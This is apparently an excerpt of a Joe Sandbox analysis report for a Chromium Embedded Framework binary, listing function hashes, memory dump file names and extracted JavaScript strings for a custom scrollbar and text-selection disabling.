                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_api_hashcef_execute_process
                                                                                                                                                                            • String ID: 11d15b06c9fb87a76f83ad5fe91f22eb03edbef5
                                                                                                                                                                            • API String ID: 1583481551-612978255
                                                                                                                                                                            • Opcode ID: 7073bd34756768840e07731e4de828ad42ddd1829c919e3ef5f2fd825d233364
                                                                                                                                                                            • Instruction ID: 98187721582c8da3d0841cf48fdbecec9aa8b124b9e36fb63bdd381d9e489106
                                                                                                                                                                            • Opcode Fuzzy Hash: 7073bd34756768840e07731e4de828ad42ddd1829c919e3ef5f2fd825d233364
                                                                                                                                                                            • Instruction Fuzzy Hash: DC213D62708A4281DF14DB29E590169A7B2FF48FD4B598436DB4D43769DF28D499C310
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            • if (__scInternalExt && __scInternalExt.CustomScrollbar) { new __scInternalExt.CustomScrollbar().activate();}, xrefs: 00007FF79CFCEE6B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID: if (__scInternalExt && __scInternalExt.CustomScrollbar) { new __scInternalExt.CustomScrollbar().activate();}
                                                                                                                                                                            • API String ID: 2864223729-1929393026
                                                                                                                                                                            • Opcode ID: 8e5c3c177139f802837b7980348f181a94c747ff7433c4aeb07622180e720b4f
                                                                                                                                                                            • Instruction ID: c63fcdbeff52211bb643716610d0bb0c35856fae26b8fc25133e0fca178d6bb1
                                                                                                                                                                            • Opcode Fuzzy Hash: 8e5c3c177139f802837b7980348f181a94c747ff7433c4aeb07622180e720b4f
                                                                                                                                                                            • Instruction Fuzzy Hash: 02218632708A4681EF20AB64E44036EA771FBC5BD4F989131EB9D07AA9DF3CC544C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            • if (__scInternalExt && __scInternalExt.DisableTextSelect) { __scInternalExt.DisableTextSelect();}, xrefs: 00007FF79CFCEF5B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID: if (__scInternalExt && __scInternalExt.DisableTextSelect) { __scInternalExt.DisableTextSelect();}
                                                                                                                                                                            • API String ID: 2864223729-2589232223
                                                                                                                                                                            • Opcode ID: c45757a5cfbc2a3afef824883f17d38b95613549d0e78bcdc3176d00afcd2908
                                                                                                                                                                            • Instruction ID: 153b1e3fdc55c43fe075add2018fae3e3f60f512d35c95197ea1feae348040c7
                                                                                                                                                                            • Opcode Fuzzy Hash: c45757a5cfbc2a3afef824883f17d38b95613549d0e78bcdc3176d00afcd2908
                                                                                                                                                                            • Instruction Fuzzy Hash: 22214472708A4281EF20AB24E45076AA771FB85BD4F989135EB9D47AA9DF3CC544C710